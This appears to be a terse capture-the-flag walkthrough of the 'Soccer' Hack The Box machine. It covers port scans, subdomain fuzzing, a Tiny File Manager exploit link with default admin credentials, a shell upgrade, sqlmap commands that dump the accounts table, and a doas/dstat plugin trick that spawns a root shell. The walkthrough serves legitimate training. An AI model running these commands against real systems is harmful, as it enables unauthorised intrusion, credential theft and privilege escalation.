Rustscan
rustscan -a soccer.htbOutput:
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
9091/tcp open xmltec-xmlmail syn-ackPort 9091
Port 80
Gobuster
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.soccer.htb" -u http://soccer.htb Output:
/index.html (Status: 200) [Size: 6917]
/.html (Status: 403) [Size: 162]
/tiny (Status: 301) [Size: 178] [--> http://soccer.htb/tiny/]
I found a RCE.
https://raw.githubusercontent.com/febinrev/tinyfilemanager-2.4.3-exploit/main/exploit.sh
Let’s follow the exemple…
And it’s the good password, but the exploit is not working.
User: admin
Password: admin@123
Revershell
Upgrade the shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm # allow clear commandThen Ctrl + Z.
stty raw -echo; fg # allow auto completionlse.sh
[!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/local/bin/doas
[*] fst000 Writable files outside user's home.............................. yes!
[*] fst080 Can we read subdirectories under /home?......................... yes!/etc/passwd
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
player:x:1001:1001::/home/player:/bin/bash
mysql:x:113:121:MySQL Server,,,:/nonexistent:/bin/false
_laurel:x:997:997::/var/log/laurel:/bin/falseLinpease
╔══════════╣ CVEs Check
Vulnerable to CVE-2021-3560
Potentially Vulnerable to CVE-2022-2588
╔══════════╣ Checking doas.conf
permit nopass player as root cmd /usr/bin/dstat
cat /etc/nginx/sites-enabled/*Output:
# We already know this one
server_name soccer.htb;
server_name soc-player.soccer.htb;
root /root/app/views;I need to add soc-player.soccer.htb to my /etc/hosts.
It’s an another website, interesting.
The root is in /root/app/views, maybe I can be root with this one.
I’ve created an account.
I have the ticker number 85240.
It’s using this script to connect:
<script>
var ws = new WebSocket("ws://soc-player.soccer.htb:9091");
window.onload = function () {
var btn = document.getElementById('btn');
var input = document.getElementById('id');
ws.onopen = function (e) {
console.log('connected to the server')
}
input.addEventListener('keypress', (e) => {
keyOne(e)
});
function keyOne(e) {
e.stopPropagation();
if (e.keyCode === 13) {
e.preventDefault();
sendText();
}
}
function sendText() {
var msg = input.value;
if (msg.length > 0) {
ws.send(JSON.stringify({
"id": msg
}))
}
else append("????????")
}
}
ws.onmessage = function (e) {
append(e.data)
}
function append(msg) {
let p = document.querySelector("p");
// let randomColor = '#' + Math.floor(Math.random() * 16777215).toString(16);
// p.style.color = randomColor;
p.textContent = msg
}
</script>var ws = new WebSocket(“ws://soc-player.soccer.htb:9091”);
It’s not working via http, it’s a websocket.
sqlmap -u “http://localhost:8081/?id=1" -p “id” –dbs –dbms=mysql
sqlmap -u “http://localhost:8081/?id=1" -p “id” -D soccer_db –tables –dbms=mysql
sqlmap -u “http://localhost:8081/?id=1" -p “id” -D soccer_db -T accounts –dump –dbms=mysql
User: player
Password: doas -u root /usr/bin/dstat –cyberw1ng
SSH
Escalation
As we saw with lipease, wt can run this as root:
doas /usr/bin/dstathttps://gtfobins.github.io/gtfobins/dstat/dstat allows you to run arbitrary python scripts loaded as “external plugins” if they are located in one of the directories stated in the dstat man page under “FILES”:
echo 'import os; os.execv("/bin/sh", ["sh"])' >/usr/local/share/dstat/dstat_xxx.py
doas -u root /usr/bin/dstat --xxx